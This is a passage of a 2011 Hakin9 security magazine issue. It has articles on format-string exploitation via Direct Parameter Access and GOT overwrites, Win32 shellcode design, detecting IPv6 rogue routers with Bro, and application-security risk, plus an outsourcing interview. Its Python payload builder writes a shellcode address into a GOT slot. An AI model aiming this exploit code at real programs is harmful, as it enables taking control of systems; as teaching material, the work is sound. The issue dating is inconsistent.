04/2011 (04)

Team
Editor in Chief: Grzegorz Tabaka
grzegorz.tabaka@hakin9.org
Managing Editor: Natalia Boniewicz
natalia.boniewicz@hakin9.org
Editorial Advisory Board: Rebecca Wynn, Matt Jonkman,
Donald Iverson, Michael Munt, Gary S. Milefsky, Julian Evans,
Aby Rao
DTP: Ireneusz Pogroszewski
Art Director: Ireneusz Pogroszewski
ireneusz.pogroszewski@hakin9.org
Proofreaders: Michael Munt, Rebecca Wynn, Elliott Bujan, Bob
Folden, Steve Hodge, Jonathan Edwards, Steven Atcheson
Top Betatesters: Nick Baronian, Rebecca Wynn, Rodrigo Rubira
Branco, Chris Brereton, Gerardo Iglesias Galvan, Jeffrey Smith, Aby
Rao, Jason Duke, Carlos Alaya, Joseph Werns, Shane Hartman,
Jose L. Herrera
Special thanks to the beta testers and proofreaders who helped
us with this issue. Without their assistance there would not be a
Hakin9 Exploiting Software magazine.
Senior Consultant/Publisher: Paweł Marciniak
CEO: Ewa Dudzic
ewa.dudzic@hakin9.org
Production Director: Andrzej Kuca
andrzej.kuca@hakin9.org
Publisher: Software Press Sp. z o.o. SK
02-682 Warszawa, ul. Bokserska 1
Phone: 1 917 338 3631
www.hakin9.org/en
Whilst every effort has been made to ensure the high quality of
the magazine, the editors make no warranty, express or implied,
concerning the results of content usage.
All trade marks presented in the magazine were used only for
informative purposes.
All rights to trade marks presented in the magazine are
reserved by the companies which own them.
To create graphs and diagrams we used program
by

Mathematical formulas created by Design Science MathType
DISCLAIMER!
The techniques described in our articles may only
be used in private, local networks. The editors
hold no responsibility for misuse of the presented
techniques or consequent data loss.
Dear Readers,
This very last issue of 2011, a pre-Christmas one, we have titled
Shellcode. This small piece of code, being simply portable native
code, has the ability to run at any place in memory, for example
inside an exploit, to connect back to the attacker or do whatever the
attacker needs to do. It is the key behind any successful exploit.
If you are curious how to write your own shellcode, and how to work
around the limitations placed on your shellcode with null-free shellcode
and alphanumeric shellcode, I highly encourage you to read the article
Shellcode: From a Simple Bug to OS Control written by Amr Thabet. You
will also learn how to use the Metasploit framework to try out your exploit.
The article DPA Exploitation and GOTs with Python written by Craig
Wright is a follow-up and second part of a look at format strings in
the C and C++ programming languages; in particular, how these may
be abused. This time the author has endeavoured to make the process of
exploiting format string vulnerabilities as simple as possible for the
inexperienced exploit developer. You will learn how to write to an
address of your choosing using Direct Parameter Access (DPA).
A well-known issue, the rogue router attack against an IPv6-enabled
network, exploits the router advertisement (RA) functionality of the
ICMPv6 protocol. In the article Detecting IPv6 Rogue Router Incidents
Using Bro NSM, Matti Mantere depicts a method for detecting these
incidents, which affect all three components of the CIA triad, using
the open source Bro NSM.
In the article Application Security 101: Our Dynamic Threat
Landscape, Anthony Czarnik shows us how vulnerabilities in
applications that access sensitive data can lead to significant loss.
Do you want to know why managers love Python? Are you curious what
the top emerging threats are? If the answer is yes, do not miss
the interview with Aldo Ceccarelli.
We wish you a beautiful Christmas and a happy New Year!
Natalia Boniewicz
& Hakin9 Team
CONTENTS
ATTACK PATTERN
8 DPA Exploitation and GOTs with Python
By Craig Wright
If we can write into the GOT, we can effectively redirect
the execution flow of a program and gain a root shell.
This article is a follow-up and second part of a look at
format strings in the C and C++ programming languages;
in particular, how these may be abused. The article goes
on to discuss crafting attacks using Python in order to
attack through DPA (Direct Parameter Access) such that
you can enact a 4-byte overwrite in the DTORS and GOT.
This time the author has endeavoured to make the process
of exploiting format string vulnerabilities as simple as
possible for the inexperienced exploit developer. A basic
knowledge of Python has been assumed, as well as an
understanding of the Linux operating system and how to
use gdb. The article starts off by detailing the use of
Direct Parameter Access and how this process works, and
then describes the Global Offset Table in detail. You will
see that exploiting Direct Parameter Access (DPA) allows
us to write to an address of our choosing.
16 Shellcode: From a Simple Bug to OS Control
By Amr Thabet
The secret behind any good exploit is a reliable shellcode.
The shellcode is the most important element in your
exploit. Generating shellcode with automated tools only
helps so much in formulating your exploit. Knowing how
to create your own shellcode will help you overcome the
barriers that lie ahead, and that's what this article will
demonstrate.
You will learn how to write a reliable shellcode on the
Win32 platform, how to bypass the obstacles that you will
face in writing a Win32 shellcode, and how to add
your shellcode to Metasploit.
DEFENSE PATTERN
34 Detecting IPv6 Rogue Router Incidents Using Bro NSM
By Matti Mantere
Internet Protocol version 6 (IPv6) has been a long time
coming. As the protocol makes its entrance, several
security risks of varying criticality are known to exist.
However, the number of skilled personnel needed to
assure the security of IPv6 network deployments, as well
as awareness of the said risks, remains woefully low.
As IPv6 migration slowly gains momentum, situations
where administrators responsible for the deployment of
network equipment have very poor knowledge and non-
existent operational experience of the new protocol are
unavoidable. Matti depicts one method for detecting the
resulting rogue router incidents using the open source
Bro NSM. Bro Network Security Monitor (Bro NSM) is a
flexible open source network analysis framework that is
freely distributed under the BSD license.
38 Application Security 101: Our Dynamic Threat Landscape
By Anthony Czarnik
Over the last couple of years, industry statistics have clearly
indicated two major changing trends in the information technology
threat landscape. First, applications are now targeted as the primary
attack vector, to the extent that 75% of current reported attacks target
the application layer. Although we have an interest in threats, as
security professionals with a responsibility to the owners of our
assets, our security decisions should ultimately be based on risk. You
will see how vulnerabilities in applications that access sensitive data
can lead to significant loss.
INTERVIEW
42 Interview with Aldo Ceccarelli
Two simple ingredients: when choosing follow your real passion in order
to be able to deliver your best talents and at full capacity; be curious
when learning and generous when teaching. Bonus track: patient when
teamworking! says Aldo Ceccarelli, Chief Information Officer and
Business Process Expert at SEDAMYL SPA, joint-venture partner of Syral.
You will see why managers love Python and what the top emerging
threats are.
ATTACK PATTERN

DPA Exploitation and GOTs with Python
By Craig Wright

This article is a follow-up and second part of a look at format strings
in the C and C++ programming languages; in particular, how these
may be abused. The article goes on to discuss crafting attacks using
Python in order to attack through DPA (Direct Parameter Access)
such that you can enact a 4-byte overwrite in the DTORS and GOT
(Global Offset Table). It then continues the attack by exploiting the
GOT and injecting shellcode. We demonstrate how these simple, still
often overlooked and even generally accepted vulnerabilities can be
used to read arbitrary locations from memory, write to memory,
execute commands and, finally, gain a shell.

Introduction
In the first part of this article (presented in Hakin9 Exploiting
Software 2/2011), we discussed format string attacks. In this article
we extend these, beginning with DPA (Direct Parameter Access) and
moving on to using the GOT (Global Offset Table) to spawn a root
shell. To gain a complete understanding of this process, it is
recommended that part one from last month's issue is read first.
In this paper, we have endeavoured to make the process of
exploiting format string vulnerabilities as simple as possible for the
inexperienced exploit developer. A basic knowledge of Python has
been assumed, as well as an understanding of the Linux operating
system and how to use gdb. We start by detailing the use of Direct
Parameter Access and how this process works, and then describe
the Global Offset Table in detail.
If we can write into the GOT, we can effectively redirect the
execution flow of a program and gain a root shell. This process also
helps when some form of stack protection stops us from altering the
saved return address (the value EIP is loaded from) and redirecting
it to a shellcode address.
In this process, we replace the address that the GOT holds for a
selected function with a reference of our own. Rather than
overwriting a return address with the address of the shellcode we
wish to call, we point the GOT entry of a function the program is
about to call at a function that can execute system commands.
Modern protections built into nearly all operating systems have
started to place the GOT in a read-only memory area (on Linux this
is full RELRO, produced by linking with -z relro -z now; readelf -l
shows a GNU_RELRO segment, and with only partial RELRO the
.got.plt section remains writable). Where this has occurred, the
system avoids the exploitation technique discussed in this paper to
a large extent. That being said, it is possible to find systems where
these protections have been disabled, or older unpatched systems,
where the complete attack works natively. At worst, even on a
system with a read-only GOT, the GOT can still be read.

Direct Parameter Access
DPA allows an attacker to access arguments through the use of the
$ qualifier. Just as we had to learn all of that difficult math before
we moved on to integrals in high school, last lesson we learned the
hard way to reach arguments using format strings. DPA makes
format string attacks simple. It allows us to address the location we
wish to exploit directly instead of having to pad attacks with
%x%x%x... Basically, as we can address the argument directly, we
no longer have to consume one argument at a time until we reach
the memory location we wish to exploit.
We showed in the last article how the following syntax allows us to
access the 8th argument from the stack using the $ qualifier: %8$x
reads it, and %8$n writes the number of bytes printed so far to the
address it holds. Again,
Figure 1. What Happened To 100?
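The following is an added example written for this page, not code from the article or from Craig Wright's own scripts. It builds the kind of DPA payload the text describes: the two target addresses go at the front of the string and, assuming a probe with %N$x has shown that they land at stack argument 8, two %hn writes set the 16-bit halves of the value. The argument index, the GOT address 0x0804a018 and the shellcode address 0xbffff5c0 are all hypothetical. Because nothing here runs a real vulnerable binary, a small model of printf's byte counting and %n stores is included so the payload can be checked before it is aimed at a process under gdb.

```python
import re
import struct

# Added example, not the article's code: build a DPA ("%N$") format string
# that writes a 32-bit value to a chosen address with two %hn short writes,
# and check it against a minimal model of printf's %n bookkeeping.


def build_dpa_write(target_addr: int, value: int, arg_index: int, prefix_len: int = 0) -> bytes:
    """Return a format string that stores `value` at `target_addr`.

    The first 8 bytes are the two addresses (little-endian x86) that will sit
    on the stack as printf arguments arg_index and arg_index+1 once the
    vulnerable printf(buf) runs; arg_index is an assumption found by probing
    with %N$x. prefix_len is the number of bytes already printed before the
    payload, if any. The address bytes must not contain 0x00 or 0x25 ('%').
    """
    payload = struct.pack("<II", target_addr, target_addr + 2)
    written = prefix_len + len(payload)
    halves = [(value & 0xFFFF, arg_index), ((value >> 16) & 0xFFFF, arg_index + 1)]
    # Write the smaller half first: the byte counter only ever grows, and
    # %hn keeps just the low 16 bits, so the second pad is taken mod 2**16.
    for want, idx in sorted(halves):
        pad = (want - written) % 0x10000
        if pad < 8:            # a 32-bit value printed with %x can need 8 digits
            pad += 0x10000
        # Pad by printing the address argument itself with a fixed width;
        # using $ on every conversion keeps the string fully positional.
        payload += b"%%%d$%dx%%%d$hn" % (idx, pad, idx)
        written += pad
    return payload


_SPEC = re.compile(r"%(\d+)\$(\d*)(x|hn|n)")


def simulate_printf(fmt: bytes, args, memory: dict) -> int:
    """Model only what matters for %n: count the bytes output and, on %hn or
    %n, store that count (16 or 32 bits) at the address held by the argument.
    `args` are the stack words printf would see (args[0] is %1$). Returns the
    total number of bytes 'printed'."""
    text = fmt.decode("latin-1")
    count = pos = 0
    for m in _SPEC.finditer(text):
        count += m.start() - pos           # literal bytes before the conversion
        pos = m.end()
        idx, width, conv = int(m.group(1)), int(m.group(2) or 0), m.group(3)
        val = args[idx - 1]
        if conv == "x":
            count += max(width, len("%x" % val))
        elif conv == "hn":
            memory[val] = count & 0xFFFF
        else:
            memory[val] = count & 0xFFFFFFFF
    return count + len(text) - pos


def demo(target: int = 0x0804A018, value: int = 0xBFFFF5C0, arg_index: int = 8) -> int:
    """Hypothetical GOT slot and shellcode address; returns the 32-bit value
    that ends up at `target` after the simulated printf."""
    payload = build_dpa_write(target, value, arg_index)
    stack = [0] * (arg_index - 1) + list(struct.unpack("<II", payload[:8]))
    memory = {}
    simulate_printf(payload, stack, memory)
    return memory[target] | (memory[target + 2] << 16)


if __name__ == "__main__":
    print(build_dpa_write(0x0804A018, 0xBFFFF5C0, 8))
    print(hex(demo()))
```

The ordering rule is the part that usually goes wrong by hand: printf's counter never decreases, so the half that needs the smaller count is written first and the second width is computed modulo 65536. Against a real target the same payload is fed to the vulnerable program and the write is confirmed in gdb with x/wx on the GOT slot.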
ATTACK PATTERN

Shellcode: From a Simple Bug to OS Control
By Amr Thabet

The secret behind any good exploit is a reliable shellcode. The
shellcode is the most important element in your exploit. Generating
shellcode with automated tools only helps so much in formulating
your exploit. Knowing how to create your own shellcode will help
you overcome the barriers that lie ahead, and that's what this article
will demonstrate.

In this article I'm going to teach you how to write a reliable
shellcode on the Win32 platform, how to bypass the obstacles that
you will face in writing a Win32 shellcode, and how to add your
shellcode to Metasploit.

Part 1: The Basics
What's Shellcode?
Shellcode is simply portable native code: machine code that can run
from any place in memory, for example inside an exploit, to connect
back to the attacker or do whatever else the attacker needs done.

The Three Types of Shellcode
Shellcode is classified by the limitations of the environment you
face while crafting a payload for a specific vulnerability.

Null Byte-Free Shellcode
In this type of shellcode you are forced to write the shellcode
without any null byte. A typical case is a vulnerability in string
handling code: C functions such as strcpy() or sprintf() copy until
they find the null byte that terminates the string, without checking
the maximum length the destination accepts, and that missing check
is what makes the application susceptible to a buffer overflow. The
same terminator rule applies to your payload: if the shellcode
contains a null byte, that byte is treated as the end of the string,
so the program copies only the part of the shellcode in front of the
null byte and discards the rest. You therefore have to avoid any null
byte inside your shellcode; the only null byte you can use is the
final one, the terminator itself.

Alphanumeric Shellcode
Ordinary text rarely contains non-printable or unusual characters.
Some IDSs (intrusion detection systems) therefore flag such strings
as malicious, especially when they contain suspicious sequences of
opcodes, and so detect the presence of shellcode. Not only that, but
some applications also filter the input and accept only normal
letters and digits (a-z, A-Z and 0-9). In this case you need to write
your shellcode using only those characters: the bytes 0x30 to 0x39,
0x41 to 0x5A and 0x61 to 0x7A.

Egg-hunting Shellcode
In some vulnerabilities you have only a very small buffer in which to
place your shellcode; with an off-by-one vulnerability, for instance,
you are restricted to a specific size and cannot send a shellcode
bigger than that.
The alternative is to use two buffers. The larger one holds your real
shellcode, prefixed with a marker (the egg); the small one holds a
short egg hunter whose only job is to search memory for that egg and
jump to the shellcode that follows it.

Part 2: Writing Shellcode
Shellcode Skeleton
Any shellcode consists of four parts: getting the delta (the
shellcode's own address at run time, which it cannot know in
advance), getting the kernel32 image base, getting your APIs
(resolving the functions you need from kernel32's export table) and
the payload.
Figure 1. Shellcode Skeleton
DEFENSE PATTERN

Detecting IPv6 Rogue Router Incidents Using Bro NSM
By Matti Mantere

As IPv6 migration slowly gains momentum, situations where
administrators responsible for the deployment of network equipment
have very poor knowledge and non-existent operational experience
of the new protocol are unavoidable. These situations are bound to
cause information security events of varying gravity. We use the
term information security here as defined broadly by the CIA triad:
confidentiality, integrity and availability.
A well-known issue, the rogue router attack against an IPv6-enabled
network, exploits the router advertisement (RA) functionality of the
ICMPv6 protocol. A rogue router incident can be caused by malicious
attackers or through poor deployment and configuration of
IPv6-capable equipment. A rogue router attack can be used to break
the confidentiality of data, the availability of Internet access from
the local area network (LAN) and data integrity, e.g. in the form of
data manipulation by the rogue router, thus affecting all three
components of the CIA triad.
In this article we depict one method for detecting such incidents
using the open source Bro NSM. Bro Network Security Monitor
(Bro NSM) is a flexible open source network analysis framework
that is freely distributed under the BSD license.

Introduction
Internet Protocol version 6 (IPv6) has been a long time coming. As
the protocol makes its entrance, several security risks of varying
criticality are known to exist. However, the number of skilled
personnel needed to assure the security of IPv6 network
deployments, as well as awareness of the said risks, remains
woefully low.
Here we concentrate on one particular issue that is caused by a
particular ICMPv6 message in a particular configuration and setting.
ICMPv6 is a much more critical component of IPv6 than its
predecessor ICMP was for Internet Protocol version 4 (IPv4). For
example, the functionality that was previously handled by the
Address Resolution Protocol (ARP) is now handled by Neighbor
Discovery, which is carried in Internet Control Message Protocol
version 6 (ICMPv6) messages. Filtering and blocking all ICMP traffic
did not cripple IPv4, but in contrast disabling ICMPv6 will
discernibly hamper the functionality of IPv6. ICMPv6 runs on top of
IPv6, having its own

Listing 1. Partial icmp.bro listing of a development version

    event icmp_router_advertisement(c: connection, icmp: icmp_conn)
        {
        print_log(c, icmp, "");

        # An empty whitelist disables the check; a listed source is a known router.
        if ( |router_whitelist| == 0 || icmp$orig_h in router_whitelist )
            return;

        # Anything else advertising itself as a router is reported.
        NOTICE([$note=ICMPRogueRouter,
                $msg=fmt("rogue router advertisement from %s", icmp$orig_h)]);
        }
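As an added example (not the article's code and not Bro script), the same whitelist rule as Listing 1 applied in Python to raw IPv6 packets: it parses the router advertisement, verifies the ICMPv6 checksum, pulls out the advertised prefix and raises a notice for any source not in the whitelist. The packets are constructed inline for the test; the router addresses fe80::1 and fe80::bad, the prefixes and the lifetimes are made up.

```python
import ipaddress
import struct

# Added example, not the article's or Bro's code: the whitelist rule of
# Listing 1 over raw IPv6 packets, with an RA parser so the notice can say
# which prefix a rogue router advertised.

ICMPV6 = 58
ROUTER_ADVERTISEMENT = 134
OPT_PREFIX_INFORMATION = 3


def icmpv6_checksum(src: bytes, dst: bytes, icmp: bytes) -> int:
    """RFC 4443 checksum over the IPv6 pseudo-header plus the ICMPv6 message.
    Computed with the checksum field zeroed; over a received message the
    result is 0 exactly when the transmitted checksum is valid."""
    data = src + dst + struct.pack("!I", len(icmp)) + b"\x00\x00\x00" + bytes([ICMPV6]) + icmp
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_ra(src: str, dst: str = "ff02::1", prefix: str = "2001:db8:1::",
             plen: int = 64, router_lifetime: int = 1800) -> bytes:
    """Constructed test traffic: an IPv6 packet carrying an RA with one
    Prefix Information option (L and A flags set)."""
    src_b, dst_b = ipaddress.IPv6Address(src).packed, ipaddress.IPv6Address(dst).packed
    option = struct.pack("!BBBBIII", OPT_PREFIX_INFORMATION, 4, plen, 0xC0,
                         2592000, 604800, 0) + ipaddress.IPv6Address(prefix).packed
    ra = struct.pack("!BBHBBHII", ROUTER_ADVERTISEMENT, 0, 0, 64, 0, router_lifetime, 0, 0) + option
    ra = ra[:2] + struct.pack("!H", icmpv6_checksum(src_b, dst_b, ra)) + ra[4:]
    ip6 = struct.pack("!IHBB", 0x60000000, len(ra), ICMPV6, 255) + src_b + dst_b
    return ip6 + ra


def parse_ra(pkt: bytes):
    """Return {src, router_lifetime, prefixes} for a valid RA, else None."""
    if len(pkt) < 40:
        return None
    vtf, payload_len, next_hdr, _hlim = struct.unpack("!IHBB", pkt[:8])
    if vtf >> 28 != 6 or next_hdr != ICMPV6:
        return None
    src_b, dst_b = pkt[8:24], pkt[24:40]
    icmp = pkt[40:40 + payload_len]
    if len(icmp) < 16 or icmp[0] != ROUTER_ADVERTISEMENT or icmp[1] != 0:
        return None
    if icmpv6_checksum(src_b, dst_b, icmp) != 0:
        return None
    _hop, _flags, lifetime, _reach, _retrans = struct.unpack("!BBHII", icmp[4:16])
    prefixes, off = [], 16
    while off + 2 <= len(icmp):
        opt_type, opt_len = icmp[off], icmp[off + 1]
        if opt_len == 0:          # RFC 4861: a zero-length option means discard the packet
            return None
        if opt_type == OPT_PREFIX_INFORMATION and opt_len == 4 and off + 32 <= len(icmp):
            prefixes.append("%s/%d" % (ipaddress.IPv6Address(icmp[off + 16:off + 32]), icmp[off + 2]))
        off += opt_len * 8
    return {"src": ipaddress.IPv6Address(src_b), "router_lifetime": lifetime, "prefixes": prefixes}


def detect_rogue_ra(packets, router_whitelist):
    """Mirror of the Bro rule: an empty whitelist means the check is off,
    a listed source is a known router, anything else raises a notice."""
    whitelist = {ipaddress.IPv6Address(a) for a in router_whitelist}
    notices = []
    for pkt in packets:
        ra = parse_ra(pkt)
        if ra is None or not whitelist or ra["src"] in whitelist:
            continue
        notices.append("rogue router advertisement from %s (prefixes: %s, lifetime %ds)"
                       % (ra["src"], ", ".join(ra["prefixes"]) or "none", ra["router_lifetime"]))
    return notices


if __name__ == "__main__":
    traffic = [build_ra("fe80::1"), build_ra("fe80::bad", prefix="2001:db8:666::")]
    for line in detect_rogue_ra(traffic, ["fe80::1"]):
        print(line)
```

Two points carry over to the Bro version: an empty whitelist silently turns the detection off, so a deployment should fail loudly if the list is unset, and the advertised prefix and router lifetime are worth logging, since a lifetime of 0 from an unknown source is the signature of an attacker trying to evict the legitimate router rather than add one.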
DEFENSE PATTERN

Application Security 101: Our Dynamic Threat Landscape
By Anthony Czarnik

Over the last couple of years, industry statistics have clearly
indicated two major changing trends in the information technology
threat landscape. First, applications are now targeted as the primary
attack vector, to the extent that 75% of current reported attacks
target the application layer.

According to the Verizon 2010 Data Breach Investigations Report,
web applications accounted for 54% of data breaches and 92% of
records breached. Although the indication is that, as a group,
information security professionals are currently doing a
commendable job guarding the perimeter and the OS layer, it is also
clear we have our work cut out for us on the application front.
The second major trend in our threat landscape concerns intent.
Over the last few years cyber criminals have generally not been
rogue individuals but predominantly organized groups with the
objective of financial or political gain. Identity and credit card
theft are the most common avenues for financial gain. Political
gain, including state-sponsored attacks, is often achieved through
intellectual property theft or cyber terrorism, including denial of
service. Using a schoolyard analogy, these are no longer bad boys
spray painting the walls; they're gangs stealing our tuition funds.

Threats are relevant; risk is our ultimate focus
Although we have an interest in threats, as security professionals
with a responsibility to the owners of our assets, our security
decisions should ultimately be based on risk. Risk is the product of
the threat level, our degree of vulnerability and our potential loss.
That's the formula. The reality is that a data breach, which
adversely affects our IT security pillars of confidentiality and
integrity, will cause you to lose your honor, and, by the way,
breaches cost $6.6M on average, which will probably cause you to
lose your job.
Another common risk is compliance failure. If your IT organization
is responsible for protecting PHI (healthcare data), failure is a
HIPAA violation. Processing or storing credit card data? Failure is a
PCI violation. The added risk with compliance is that you don't even
need to get breached to suffer a loss: non-compliance results in fines
(consider that incurring HIPAA fines has also become more common
since HITECH was passed).
Public reaction to data breaches has also become severe. According
to the Ponemon Institute, 33% of consumers who have had their
information breached terminate their relationship with the business
partner determined to be responsible. How bad is that? Go ask your
Marketing VP how much it cost to attain 33% of your customers. The
aggregate consequences of a data breach can be brutal:
Lost customers and lost revenue (long-term effect)
Legal and compliance problems
Reputational damage
Beyond a data breach, we must also be concerned with denial of
service attacks, which degrade our availability security pillar and
result in lost revenue and lost customers.

Application vulnerabilities: the perfect storm
There is a reason that, since we secured the OS and perimeter fairly
well, cyber criminals are targeting the application layer.
Applications consist of source code, often from numerous sources,
architectural decisions, executable code, configurations, database
integration, implementation into the existing network, and more.
Applications are complex to secure and application security is
immature: the perfect storm. The result: both Gartner and NIST
reported that 95% of recently reported vulnerabilities are located in
software. SANS comparisons highlighted that the number of
vulnerabilities currently being discovered in applications is
tremendously higher than the number being discovered in operating
systems. Gartner also estimates that two-thirds of web applications
INTERVIEW

Interview with Aldo Ceccarelli

Aldo Ceccarelli is Chief Information Officer and Business Process
Expert at SEDAMYL SPA, joint-venture partner of Syral (Group
Tereos, France). In the past he was a member of S-IT Management
(in outsourcing for SEDAMYL SPA) at Etea (http://www.eteagroup.com/),
and System Administrator, Programmer and ISO 9000 Quality Manager
at CITAL SRL (http://www.cital.it).

How did you realize that the solutions would fit your business
model better than other methods?
Our must is learning to evaluate and introduce outsourcing at best.
The latest outsourcing surveys (I like to remember the State of
Outsourcing 2011 survey, conducted in partnership with The
Outsourcing Unit at the London School of Economics, in particular)
show that CIOs are achieving cost savings from their arrangements
with their service providers, but an important issue is that
sometimes we aren't getting much else in the way of business value.
Here's how IT solution buyers can change that.
According to this year's outlook perspective, IT service providers
aren't likely to change their approaches unless buyers demand more
from them. Therefore, IT outsourcing customers who want to move
beyond cost cutting must put business value at the forefront of their
outsourcing arrangements. Here are four ways to accomplish that goal
that I am trying to follow:
Stop taking the low-cost bait. Cost-cutting deals will deliver cost
cutting.
Contract for value. Real business value gets short shrift in most
outsourcing deals.
Have the courage to change. Be willing to abandon processes and
technologies that don't deliver real innovation goods.
Look beyond SLAs to business outcomes. Service level agreements
are important, but business value is tantamount. Work with your
provider to create outcome-based metrics for the relationship to
supplement the deal's operational SLAs.

What separates your methods from others?
I am trying to focus on the fact that, as CIOs, we would benefit
from a framework for innovation, and some of us operating in SMEs
would be willing to pay more for an outsourcer that really can help
us formalize and maintain a successful innovation process. A good
method for us was to institute monitoring of leading key performance
indicators and adopt formal root cause analysis processes. In this
manner, issues are detected before they become critical, and once
detected, can be definitely eliminated.

Could you tell us more about the company that you work for?
In the early 1950s the Frandino family founded Sedamyl, a simple
fruit distillery (its original name was Seda).
From the earliest stages, the company's growth has been
characterized by dedication to maintaining its core values. It has
become the leading Italian producer of wheat-based products for the
food and paper industries, as well as for fermentation.
Starch is used in various industries: food, textile, paper, detergent,
glue and plastic.
Glucose syrups, liquid or dehydrated, are used as ingredients for soft
drinks, ice creams, sweets and other food products.
Grain alcohol, due to its neutral flavor and excellent quality, has
always been used in the production of high quality spirits and
liquors.
Gluten is used in the food industry, primarily for baked goods.